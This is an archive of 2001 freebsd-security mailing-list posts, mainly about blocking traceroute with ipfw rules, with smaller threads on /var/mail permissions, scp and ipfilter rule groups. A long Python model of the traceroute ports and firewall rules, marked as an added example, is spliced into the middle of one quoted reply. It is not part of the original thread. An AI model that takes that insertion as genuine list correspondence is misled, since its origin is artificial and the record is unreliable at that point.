From: Peter Pentchev
To: alexus
Cc: Simon Rakovec, freebsd-security@freebsd.org
Subject: Re: disable traceroute to my host
Date: Tue, 26 Jun 2001 08:58:04 +0300
Message-ID: <20010626085804.E780@ringworld.oblivion.bg>
In-Reply-To: <01ec01c0fdb1$6c9cada0$9865fea9@book>

On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote:
> i agree this is not a solution.. looks like ttl=1 is best solution so far

TTL=1 is not a general solution, because it only blocks traceroutes to this
particular host, not to any machines that it is acting as a gateway for.

Moreover, TTL=1 is not a real-world solution, because some *legitimate*
packets might arrive with TTL=1 (yes, there are some OS's that set too low
TTL's on outgoing packets, and there are some global backbone ISP's which
have a *lot* of routers, so it is possible that a normal packet destined
for your host should reach you with TTL=1).

And just btw..
Really, why do you want to block traceroutes?

G'luck,
Peter

--
because I didn't think of a good beginning of it.

> ----- Original Message -----
> From: "Peter Pentchev"
> To: "Simon Rakovec"
> Sent: Monday, June 25, 2001 2:37 AM
> Subject: Re: disable traceroute to my host
>
> > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote:
> > > Try this:
> > >
> > > ipfw add deny udp from any 32769-65535 to 33434-33523
> >
> > As Karsten noted in a followup, this is not proper network practice.
> > There might be a LOT of things listening on those UDP ports, including
> > ephemeral outgoing UDP connections.
> >
> > As many other people noted, this does not stop Windows traceroute,
> > which goes via ICMP.
> >
> > As the traceroute(8) manpage notes, this does not stop people who
> > know how to use the traceroute '-p port' option to select a starting
> > port != 32768.
> >
> > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable
> > a person determined to traceroute you, and in practice, there is
> > no need to.
> >
> > G'luck,
> > Peter
> >
> > PS. How was that now... one source: plagiarism, two sources: comparative
> > study, three sources: an academic thesis.. I did even better than that! ;)
> >
> > --
> > Thit sentence is not self-referential because "thit" is not a word.
> >
> > > alexus wrote:
> > > >
> > > > is it possible to disable using ipfw so people won't be able to
> > > > traceroute me?
From owner-freebsd-security Mon Jun 25 23:07:39 2001
From: Peter Pentchev
To: alexus
Cc: ohshutup@zdnetonebox.com, freebsd-security@freebsd.org
Subject: Re: disable traceroute to my host
Date: Tue, 26 Jun 2001 09:12:20 +0300
Message-ID: <20010626091220.G780@ringworld.oblivion.bg>
In-Reply-To: <005f01c0fdac$15221010$9865fea9@book>

On Mon, Jun 25, 2001 at 03:21:49PM -0400, alexus wrote:
> the thing is that windows based machines they using icmp for traceroute and
> unix uses udp..
>
> what i'd like to know is:
>
> which type of icmp uses for traceroute? (for example by deny icmp for
> incoming icmptype 8 i was able to deny any pinging of my box from outside
> *BUT* i can ping everyone myself from my box)

tcpdump -nl icmp

> also i'd like to know which standard range of ports udp uses in unix's
> traceroute?

man 8 traceroute

G'luck,
Peter

--
because I didn't think of a good beginning of it.
From owner-freebsd-security Mon Jun 25 23:08:20 2001
From: Igor Podlesny
Organization: Morning Network
To: Peter Pentchev
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[2]: disable traceroute to my host
Date: Tue, 26 Jun 2001 14:09:20 +0700
Message-ID: <157329906330.20010626140920@morning.ru>
In-Reply-To: <20010626085804.E780@ringworld.oblivion.bg>

> On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote:
[...]
> And just btw.. Really, why do you want to block traceroutes?

the subject is flaming like a flame, but by its nature is quite peaceful :)
so why bother with "why?"?
:) ppl are talking, somebody even reads what others write, and it grows and
goes on and on :)

> G'luck,
> Peter

--
Igor
mailto:poige@morning.ru

From owner-freebsd-security Mon Jun 25 23:33:05 2001
From: Danny Wong
Organization: Pentalpha
Subject: help on TLS error
Date: Tue, 26 Jun 2001 14:32:25 +0800
Message-ID: <004501c0fe09$c3d74640$a800000a@pentalpha.com.hk>

I found the following error in the log file and the email cannot be sent
out. How can I find it? And what is wrong with it?
Jun 26 14:16:40 host sendmail[1069]: f5M9Rr631838: ruleset=tls_server, arg1=SOFTWARE, relay=mail.xxx.com, reject=403 4.7.0 ... TLS handshake failed.

Thanks!
Danny

From owner-freebsd-security Tue Jun 26 04:16:32 2001
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Organization: http://www.security.nnov.ru
To: "alexus"
Cc: freebsd-security@FreeBSD.org
Subject: Re[2]: disable traceroute to my host
Date: Tue, 26 Jun 2001 15:08:13 +0400
Message-ID: <3181060651.20010626150813@SECURITY.NNOV.RU>
In-Reply-To: <009201c0fdad$57c2af00$9865fea9@book>

Hello alexus,

BSD-style traceroute sends UDP packets starting from port 33434, increasing
the port for every packet. If someone traceroutes your host with 3 packets
for each TTL, and your host is located 4 hops away, you'll get UDP packets
for ports 33443-33445 if your server replies to traceroute, or 33443-33490
(default is 20 hops max) if your host is unreachable.
The ipfw rule

  deny udp from any to YOURNET 33430-33500 in

will stop default BSD traceroute, but can lead to some problems if these
ports are dynamically allocated to some program.

Windows uses ICMP type 8 (echo) for traceroute. You must disable incoming
ICMP type 8 to prevent windows-style traceroute (this will also stop
discovering the route via ping -R). Use

  deny icmp from any to YOURNET icmptypes 8 in

Another possible solution is to prevent your hosts from replying to
traceroute:

  deny icmp from (YOURNETWORK) to any icmptypes 0,3,11 out

0  - to stop windows traceroute and ping
3  - to stop BSD-style traceroute
11 - to prevent intermediate routers from replying to traceroute

--Monday, June 25, 2001, 11:30:50 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

a> i understand i can't really disable the whole tree of traceroute .. i only
a> can disable my very last hop.. i also understand it's not going do much..
a> but i still would like to do so..

a> i need to find out which icmp type is it uses and most of all how i can make
a> so i can traceroute from my box but people won't be able to traceroute to me
a> (on last hop)

a> ----- Original Message -----
a> From: "3APA3A" <3APA3A@SECURITY.NNOV.RU>
a> To: "alexus"
a> Sent: Saturday, June 23, 2001 7:05 AM
a> Subject: Re: disable traceroute to my host

>> Hello alexus,
>>
>> It's impossible to disable traceroute on your host. You can filter
>> incoming ICMP echo request and UDP packets or outgoing TTL exceeded
>> ICMP packets on corporate firewall to disable your internal network
>> structure discovery, but it doesn't solve problem completely, because
>> route can be traced with different kinds of packets. Better way is to
>> use NAT between private and public networks.
>>
>> --Saturday, June 23, 2001, 2:32:10 AM, you wrote to freebsd-security@FreeBSD.ORG:
>>
>> a> is it possible to disable using ipfw so people won't be able to
>> a> traceroute me?
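As an added example (not code from the thread or from 3APA3A), here is the probe-port arithmetic and the three ipfw rules above as a small Python model: it reproduces the 33443-33445 range for a host 4 hops away and evaluates constructed sample packets against the rules, including a legitimate UDP reply to an ephemeral port inside 33430-33500, which is the collateral drop the post warns about. YOURNET is the post's placeholder for the protected network, the rules are plain predicates rather than a real ipfw evaluation, and the port model follows the post (first probe to 33434, one port per probe); real traceroute implementations differ in exactly where the first probe lands.

```python
"""Model of BSD traceroute probe ports and the ipfw deny rules from the post above.

Added example, not code from the thread.  Port arithmetic follows the post:
first probe to UDP 33434, one port per probe, three probes per TTL, 20 hops
max.  The rules are plain predicates over a constructed packet record, not a
real ipfw evaluation; YOURNET is the post's placeholder for the protected net.
"""
from dataclasses import dataclass
from typing import Optional

BASE_PORT = 33434        # default traceroute base port, as given in the post
DEFAULT_NPROBES = 3      # probes per TTL, as given in the post
DEFAULT_MAX_TTL = 20     # hop limit the post assumes


def probe_ports(hops, reached=True, nprobes=DEFAULT_NPROBES,
                max_ttl=DEFAULT_MAX_TTL, base=BASE_PORT):
    """UDP destination ports (first, last) seen by a target `hops` away.

    Probe number k (counted over all TTLs, from 0) goes to base + k, so the
    probes for TTL t occupy base + (t-1)*nprobes .. base + t*nprobes - 1.
    A host that answers sees only its own TTL's probes; one that never answers
    keeps receiving probes until the tracer gives up at max_ttl.
    """
    first = base + (hops - 1) * nprobes
    last_ttl = hops if reached else max_ttl
    return first, base + last_ttl * nprobes - 1


@dataclass(frozen=True)
class Packet:
    proto: str                   # "udp" or "icmp"
    direction: str               # "in" or "out", as ipfw sees it on this host
    dst_in_yournet: bool
    src_in_yournet: bool
    dport: Optional[int] = None  # UDP destination port
    icmptype: Optional[int] = None


# The post's three rules, in order.  Each returns True when it would deny.
def deny_udp_probes_in(p):
    # deny udp from any to YOURNET 33430-33500 in
    return (p.proto == "udp" and p.direction == "in" and p.dst_in_yournet
            and p.dport is not None and 33430 <= p.dport <= 33500)


def deny_icmp_echo_in(p):
    # deny icmp from any to YOURNET icmptypes 8 in
    return (p.proto == "icmp" and p.direction == "in" and p.dst_in_yournet
            and p.icmptype == 8)


def deny_icmp_replies_out(p):
    # deny icmp from YOURNET to any icmptypes 0,3,11 out
    return (p.proto == "icmp" and p.direction == "out" and p.src_in_yournet
            and p.icmptype in (0, 3, 11))


RULES = [
    ("udp-probes-in", deny_udp_probes_in),
    ("icmp-echo-in", deny_icmp_echo_in),
    ("icmp-replies-out", deny_icmp_replies_out),
]


def first_match(p):
    """Name of the first rule that denies p, or None if all three pass it."""
    for name, denies in RULES:
        if denies(p):
            return name
    return None


# Constructed sample traffic (not captured data), labelled by what it stands for.
SAMPLES = {
    "bsd traceroute probe, TTL 4, first probe":
        Packet("udp", "in", True, False, dport=probe_ports(4)[0]),
    "windows tracert echo request":
        Packet("icmp", "in", True, False, icmptype=8),
    "our port-unreachable answering a probe":
        Packet("icmp", "out", False, True, icmptype=3),
    "inside router's ttl-exceeded for a probe":
        Packet("icmp", "out", False, True, icmptype=11),
    "dns reply to our resolver's ephemeral port 33450":
        Packet("udp", "in", True, False, dport=33450),
    "our own outgoing ping":
        Packet("icmp", "out", False, True, icmptype=8),
    "echo reply to our own ping":
        Packet("icmp", "in", True, False, icmptype=0),
}


def evaluate(samples=SAMPLES):
    """Map each sample label to the denying rule (or None).

    The DNS reply is the post's caveat in action: the UDP rule cannot tell a
    traceroute probe from a legitimate answer to an ephemeral port, so any
    reply the kernel happens to expect on 33430-33500 is lost.  The two ping
    cases show why alexus's own outbound ping keeps working under rule two.
    """
    return {label: first_match(p) for label, p in samples.items()}


if __name__ == "__main__":
    print("4 hops, answering:   ports %d-%d" % probe_ports(4))
    print("4 hops, unreachable: ports %d-%d" % probe_ports(4, reached=False))
    for label, rule in evaluate().items():
        print("%-48s -> %s" % (label, rule or "pass"))
```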
>>
>> --
>> ~/3APA3A
>> ...without a club he never took up programming. (Lem)

--
~/3APA3A
While you are in the hands of providence, you will not manage to die before your time. (Twain)

From owner-freebsd-security Tue Jun 26 04:23:03 2001
From: Valentin Nechayev
Reply-To: netch@lucky.net
To: Igor Podlesny
Cc: Peter Pentchev, freebsd-security@FreeBSD.ORG
Subject: Re: Re[2]: disable traceroute to my host
Date: Tue, 26 Jun 2001 14:21:58 +0300
Message-ID: <20010626142158.A33308@lucky.net>
In-Reply-To: <157329906330.20010626140920@morning.ru>

Tue, Jun 26, 2001 at 14:09:20, poige wrote about "Re[2]: disable traceroute to my host":

> > And just btw.. Really, why do you want to block traceroutes?
> the subject is flaming like a flame, but by its nature is quite peaceful :)
> so why bother with "why?"? :) ppl are talking, somebody even read what
> others write, and it grows and goes on and on :)

Then, the first reply to such a question should be: "You don't want to do it."
;)))

/netch

From owner-freebsd-security Tue Jun 26 04:29:20 2001
From: Valentin Nechayev
Reply-To: netch@lucky.net
To: Leonard Chung
Cc: security@FreeBSD.ORG
Subject: Re: "Correct" permissions on /var/mail?
Date: Tue, 26 Jun 2001 14:28:53 +0300
Message-ID: <20010626142853.B33308@lucky.net>
In-Reply-To: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com>

Sun, Jun 24, 2001 at 14:11:54, leonard wrote about ""Correct" permissions on /var/mail?":

> I was having a debate with a colleague the other day on the correct mode
> for /var/mail. He claimed that 1777 is more secure than what I've always
> had (the FreeBSD default of root:mail 775).

1777 has the only advantage that it doesn't require sgid privileges for
MUAs. But such a solution is not less harmful, due to the new /tmp in
/var/mail. A better variant is to fix the MUA to use a separate locking
program (such as mutt-dotlock) or even get rid of /var/mail as ugly legacy.
Keep all incoming mail in the user's home and "your teeth will be white and
fluffy".

> 1777 gives you the additional benefit of protecting you from compromises on
> the mail group, but requires that on every machine quotas be installed even
> for machines with just one or two users.
> Without quotas, a malicious user
> could fill up /var/mail creating a DoS for everybody receiving mail off
> that machine. 775 doesn't protect against compromises of the mail group,
> but has the added benefit that it protects against a user filling /var/mail
> inadvertently as they would have to purposely send lots of e-mail.

The requirement to have /var/mail as a separate partition is too hard for
most applications.

/netch

From owner-freebsd-security Tue Jun 26 04:41:24 2001
From: Valentin Nechayev
Reply-To: netch@lucky.net
To: Michael Richards
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Letting scp through a firewall using ipfilter
Date: Tue, 26 Jun 2001 14:41:04 +0300
Message-ID: <20010626144104.C33308@lucky.net>
In-Reply-To: <3B338EFB.000039.73802@frodo.searchcanada.ca>

Fri, Jun 22, 2001 at 14:31:23, michael wrote about "Letting scp through a firewall using ipfilter":

> I'm trying to get my firewall to allow scp through. It currently
> allows ssh in, but it appears that scp creates an outgoing connection
> from the remote machine back to the originating machine. Anyone know
> how to solve this problem?

scp does not create such a connection. You mixed it up with ftp in active mode.
/netch

From owner-freebsd-security Tue Jun 26 05:03:43 2001
From: Valentin Nechayev
Reply-To: netch@lucky.net
To: "Antoine Beaupre (LMC)"
Cc: Igor Roshchin, freebsd-security@FreeBSD.ORG
Subject: Re: Read-only /etc/defaults/* (was: Re: /etc/defaults/rc.conf (Was: IPFW newbie))
Date: Tue, 26 Jun 2001 15:01:26 +0300
Message-ID: <20010626150126.D33308@lucky.net>
In-Reply-To: <3B2F9648.3030007@lmc.ericsson.se>

Tue, Jun 19, 2001 at 14:13:28, Antoine.Beaupre wrote about "Read-only /etc/defaults/* (was: Re: /etc/defaults/rc.conf (Was: IPFW newbie))":

> I think we should consider the possibility of having /etc/defaults/*
> files read-only to "encourage" this behavior.

`install -f uchg' ?
/netch

From owner-freebsd-security Tue Jun 26 10:08:05 2001
From: Sheldon Hearn
To: netch@lucky.net
Cc: Leonard Chung, security@FreeBSD.ORG
Subject: Re: "Correct" permissions on /var/mail?
Date: Tue, 26 Jun 2001 19:07:43 +0200
Message-ID: <847.993575263@axl.seasidesoftware.co.za>
In-reply-to: Your message of "Tue, 26 Jun 2001 14:28:53 +0300." <20010626142853.B33308@lucky.net>

Presumably you missed the early post that explained that this is a common
thread on several mailing lists and needn't be rehashed on this one.

Please do us all a favour and follow the URL that was posted if you really
think this is interesting.

Ciao,
Sheldon.
From owner-freebsd-security Tue Jun 26 10:56:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 247CB37B401 for ; Tue, 26 Jun 2001 10:56:16 -0700 (PDT) (envelope-from netch@lucky.net)
Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id UVP69925; Tue, 26 Jun 2001 20:56:06 +0300 (EEST) (envelope-from netch)
Date: Tue, 26 Jun 2001 20:56:06 +0300
From: Valentin Nechayev
To: Sheldon Hearn
Cc: security@freebsd.org
Subject: Re: "Correct" permissions on /var/mail?
Message-ID: <20010626205606.K20517@lucky.net>
Reply-To: netch@lucky.net
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <847.993575263@axl.seasidesoftware.co.za>
X-42: On

> Presumably you missed the early post that explained that this is a

No, I didn't miss it, along with the bugtraq thread. But this pseudo-URL directs to nowhere. If you really want to lead people to read that bugtraq thread, I ask you to post a correct URL without any non-working "switch to thread index and scroll down until the moon transforms into a piece of green cheese".

> common thread on several mailing lists and needn't be rehashed on this
> on.

If you insist that bugtraq is The Only Right Place to discuss some questions, I can only shrug. Bugtraq does not have FreeBSD specifics. If one has new & interesting thoughts (and I don't suppose that 100% of human brains are gathered in bugtraq), he (she) can say it here. security@ is a more correct FreeBSD mailing list for it than most others.
I don't pretend to expose new & interesting thoughts, but I think there is a chance of such postings appearing, both interesting and reflecting local specifics. Your policy shout wipes it out for the cemetery's sake.

> Please do us all a favour and follow the URL that was posted if you
> really think this is interesting.

I don't think it is "interesting". It's not "interesting" for me. It's a _pity_ and shows the whole Unix ugliness. But "we're to live _here_".

From owner-freebsd-security Tue Jun 26 11:22:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nomad.tor.lets.net (H74.C220.tor.velocet.net [216.138.220.74]) by hub.freebsd.org (Postfix) with SMTP id 6046E37B41E for ; Tue, 26 Jun 2001 11:22:16 -0700 (PDT) (envelope-from steve@nomad.lets.net)
Received: (qmail 7819 invoked by uid 1001); 26 Jun 2001 18:17:21 -0000
Date: Tue, 26 Jun 2001 14:17:21 -0400
From: Steve Shorter
To: freebsd-security@freebsd.org
Subject: IPFilter - this should work but doesnt?
Message-ID: <20010626141721.B7785@nomad.lets.net>
References: <847.993575263@axl.seasidesoftware.co.za> <20010626205606.K20517@lucky.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010626205606.K20517@lucky.net>; from netch@lucky.net on Tue, Jun 26, 2001 at 08:56:06PM +0300

Howdy!

I have some diskless frontend servers behind a Cisco Firewall and am using ipfilter on the servers to solve some local access/security issues.

OS - FreeBSD 4.3
IPFilter - 3.4.16, default pass all

Here are two ipf.rules segments from otherwise identical files.
When the first segment is included everything works well, while if the second is substituted it hangs on loading (though sometimes it does work, but usually not), probably because NFS is fubar'd:

# ipf -v -Fa -f /etc/ipf.rules
remove flags IO (12)
removed 0 filter rules
[block in log level local0.warn quick all with ipopts]
[snip]
[block out log level local0.warn quick on fxp1 all head 112]
block out log level local0.warn quick on fxp1(!) from any to any head 112
[block in log level local0.warn quick on fxp2 all head 121]
block in log level local0.warn quick on fxp2(!) from any to any head 121
[block out log level local0.warn quick on fxp2 all]
block out log level local0.warn quick on fxp2(!) from any to any
[pass in quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8 ]
pass in quick on lo0(!) from 127.0.0.0/8 to 127.0.0.0/8
[pass out quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8]
pass out quick on lo0(!) from 127.0.0.0/8 to 127.0.0.0/8
[pass in quick proto udp from 192.168.10.4/32 port = nfsd to 192.168.10.7/32 port < 1024 keep state keep frags group 101]

hangs at this point ...

Is the fxp1(!) and similar important? What does it mean? The second should work (I think) and I prefer it structurally.

Ideas?
thanx
-steve

# This works good
block in all
block out all
block in log level local0.warn quick all with ipopts
block in log level local0.warn quick all with short
block in log level local0.warn quick proto icmp from any to any
block out log level local0.warn quick proto icmp from any to any

# If I put the next 2 lines in group 101 and 102 doesn't work
pass in quick proto udp from 192.168.10.4/32 port = nfsd to 192.168.10.7/32 port < 1024 keep state keep frags
pass out quick proto udp from 192.168.10.7/32 port < 1024 to 192.168.10.4/32 port = nfsd keep state keep frags

block in log level local0.warn quick on fxp0 all head 101
block out log level local0.warn quick on fxp0 all head 102
block in log level local0.warn quick on fxp1 all head 111
block out log level local0.warn quick on fxp1 all head 112
block in log level local0.warn quick on fxp2 all head 121
block out log level local0.warn quick on fxp2 all

pass in quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8
pass out quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8

# group 101 - fxp0 - IN
#
pass in quick proto udp from 192.168.10.1/32 to 192.168.10.7/32 port = snmp keep state group 101
pass in quick proto tcp from 192.168.10.1/32 to 192.168.10.7/32 port = ssh flags S/SA keep state group 101

# group 102 - fxp0 - OUT
#
pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = domain keep state group 102
pass out quick proto udp from 192.168.10.7/32 port = syslog to 192.168.10.1/32 port = syslog keep state group 102
pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = ntp keep state group 102
pass out quick proto tcp from 192.168.10.7/32 to 192.168.10.1/32 port = qmqp keep state group 102

# group 111 - fxp1
#
pass in quick proto udp from 192.168.30.4/32 port = nfsd to 192.168.30.7/32 port < 1024 keep state keep frags group 111

[ etc ... etc .. nothing interesting...
snip]

# This doesn't work
block in all
block out all
block in log level local0.warn quick all with ipopts
block in log level local0.warn quick all with short
block in log level local0.warn quick proto icmp from any to any
block out log level local0.warn quick proto icmp from any to any

block in log level local0.warn quick on fxp0 all head 101
block out log level local0.warn quick on fxp0 all head 102
block in log level local0.warn quick on fxp1 all head 111
block out log level local0.warn quick on fxp1 all head 112
block in log level local0.warn quick on fxp2 all head 121
block out log level local0.warn quick on fxp2 all

pass in quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8
pass out quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8

# group 101 - fxp0 - IN
#
# having the next line in this ruleset seems structurally better and
# should work but doesn't, Works good if inserted earlier
pass in quick proto udp from 192.168.10.4/32 port = nfsd to 192.168.10.7/32 port < 1024 keep state keep frags group 101
pass in quick proto udp from 192.168.10.1/32 to 192.168.10.7/32 port = snmp keep state group 101
pass in quick proto tcp from 192.168.10.1/32 to 192.168.10.7/32 port = ssh flags S/SA keep state group 101

# group 102 - fxp0 - OUT
#
# having the next line in this ruleset seems structurally better and
# should work but doesn't, Works good if inserted earlier
pass out quick proto udp from 192.168.10.7/32 port < 1024 to 192.168.10.4/32 port = nfsd keep state keep frags group 102
pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = domain keep state group 102
pass out quick proto udp from 192.168.10.7/32 port = syslog to 192.168.10.1/32 port = syslog keep state group 102
pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = ntp keep state group 102
pass out quick proto tcp from 192.168.10.7/32 to 192.168.10.1/32 port = qmqp keep state group 102

# group 111 - fxp1
#
pass in quick proto udp from 192.168.30.4/32 port = nfsd to 192.168.30.7/32 port < 1024 keep state keep frags group 111

# group 112 - fxp1
#
pass out quick proto udp from 192.168.30.7/32 port < 1024 to 192.168.30.4/32 port = nfsd keep state keep frags group 112
pass out quick proto tcp from 192.168.60.7/32 port > 1023 to 192.168.60.0/24 port = http keep state group 112
pass out quick proto udp from 192.168.30.7/32 to 192.168.30.5/32 port = domain keep state group 121

# group 121 - fxp2
[ etc .. etc.. nothing interesting snip]

Thanks for insight
- steve

From owner-freebsd-security Tue Jun 26 12:23: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id BBC3737B401 for ; Tue, 26 Jun 2001 12:23:00 -0700 (PDT) (envelope-from sheldonh@starjuice.net)
Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15EyQS-0000mF-00; Tue, 26 Jun 2001 21:23:04 +0200
From: Sheldon Hearn
To: netch@lucky.net
Cc: security@freebsd.org
Subject: Re: "Correct" permissions on /var/mail?
In-reply-to: Your message of "Tue, 26 Jun 2001 20:56:06 +0300." <20010626205606.K20517@lucky.net>
Date: Tue, 26 Jun 2001 21:23:04 +0200
Message-ID: <2990.993583384@axl.seasidesoftware.co.za>

On Tue, 26 Jun 2001 20:56:06 +0300, Valentin Nechayev wrote:

> If you insist that bugtraq is The Only Right Place to discuss some
> questions, I can only shrug.

No. Someone else posted the Bugtraq reference. The point isn't where it was discussed. The point is that this has been discussed many times before on many mailing lists and nothing new has been said on the subject for a while.

> I don't think it is "interesting".
> It's not "interesting" for me.
> It's a _pity_ and shows the whole Unix ugliness. But "we're to live _here_".

Now look at it from the perspective of folks who've watched this topic over and over again and think about whether it's really too much to ask for folks to whom this is new to go and do a little reading in mailing list archives.

Ciao,
Sheldon.

From owner-freebsd-security Tue Jun 26 12:30:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 5213737B405 for ; Tue, 26 Jun 2001 12:30:43 -0700 (PDT) (envelope-from ml@db.nexgen.com)
Received: (qmail 76132 invoked from network); 26 Jun 2001 19:31:06 -0000
Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 26 Jun 2001 19:31:06 -0000
Message-ID: <002701c0fe76$7530eab0$01000001@book>
From: "alexus"
To: "Peter Pentchev"
Cc: "Simon Rakovec" ,
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg>
Subject: Re: disable traceroute to my host
Date: Tue, 26 Jun 2001 15:30:28 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

someone else using ttl=1? that sucks.. oh well i guess it's impossible to disable it.. cuz i don't want to block something that should work..
thanks everyone

----- Original Message -----
From: "Peter Pentchev"
To: "alexus"
Cc: "Simon Rakovec" ;
Sent: Tuesday, June 26, 2001 1:58 AM
Subject: Re: disable traceroute to my host

> On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote:
> > i agree this is not a solution.. looks like tty=1 is best solution so far
>
> TTL=1 is not a general solution, because it only blocks traceroutes to this
> particular host, not to any machines that it is acting as a gateway for.
>
> Moreover, TTL=1 is not a real-world solution, because some *legitimate*
> packets might arrive with TTL=1 (yes, there are some OS's that set too
> low TTL's on outgoing packets, and there are some global backbone ISP's
> which have a *lot* of routers, so it is possible that a normal packet
> destined for your host should reach you with TTL=1).
>
> And just btw.. Really, why do you want to block traceroutes?
>
> G'luck,
> Peter
>
> --
> because I didn't think of a good beginning of it.
>
> > ----- Original Message -----
> > From: "Peter Pentchev"
> > To: "Simon Rakovec"
> > Cc:
> > Sent: Monday, June 25, 2001 2:37 AM
> > Subject: Re: disable traceroute to my host
> >
> >
> > > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote:
> > > > Try this:
> > > >
> > > > ipfw add deny udp from any 32769-65535 to 33434-33523
> > >
> > > As Karsten noted in a followup, this is not proper network practice.
> > > There might be a LOT of things listening on those UDP ports, including
> > > ephemeral outgoing UDP connections.
> > >
> > > As many other people noted, this does not stop Windows traceroute,
> > > which goes via ICMP.
> > >
> > > As the traceroute(8) manpage notes, this does not stop people who
> > > know how to use the traceroute '-p port' option to select a starting
> > > port != 32768.
> > >
> > > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable
> > > a person determined to traceroute you, and in practice, there is
> > > no need to.
> > >
> > > G'luck,
> > > Peter
> > >
> > > PS. How was that now... one source: plagiarism, two sources: comparative
> > > study, three sources: an academic thesis.. I did even better than that! ;)
> > >
> > > --
> > > Thit sentence is not self-referential because "thit" is not a word.
> > >
> > > > alexus wrote:
> > > > >
> > > > > is it possible to disable using ipfw so people won't be able to traceroute
> > > > > me?

From owner-freebsd-security Tue Jun 26 14:16: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id DA72D37B401 for ; Tue, 26 Jun 2001 14:15:54 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au)
Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id HAA02797; Wed, 27 Jun 2001 07:15:07 +1000 (EST)
Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37641) with ESMTP id <01K594BRFDJ4VFAJ4X@cim.alcatel.com.au>; Wed, 27 Jun 2001 07:14:53 +1000
Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f5QLF5v92583; Wed, 27 Jun 2001 07:15:05 +1000 (EST envelope-from jeremyp)
Content-return: prohibited
Date: Wed, 27 Jun 2001 07:15:04 +1000
From: Peter Jeremy
Subject: Re: disable traceroute to my host
In-reply-to: <3181060651.20010626150813@SECURITY.NNOV.RU>; from 3APA3A@SECURITY.NNOV.RU on Tue, Jun 26, 2001 at 03:08:13PM +0400
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Cc: alexus , freebsd-security@FreeBSD.ORG
Mail-Followup-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>, alexus , freebsd-security@FreeBSD.ORG
Message-id: <20010627071504.P95583@gsmx07.alcatel.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.5i
References:
<006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU>

On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out
>
>0 - to stop windows traceroute and ping
>3 - to stop BSD-style traceroute
>11 - to prevent intermediate router to reply traceroute

Blocking ICMP type 3 will break Path-MTU discovery (which relies on type 3 code 4).

Peter

From owner-freebsd-security Tue Jun 26 16: 2:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id 59A7C37B409 for ; Tue, 26 Jun 2001 16:02:13 -0700 (PDT) (envelope-from mail@max-info.net)
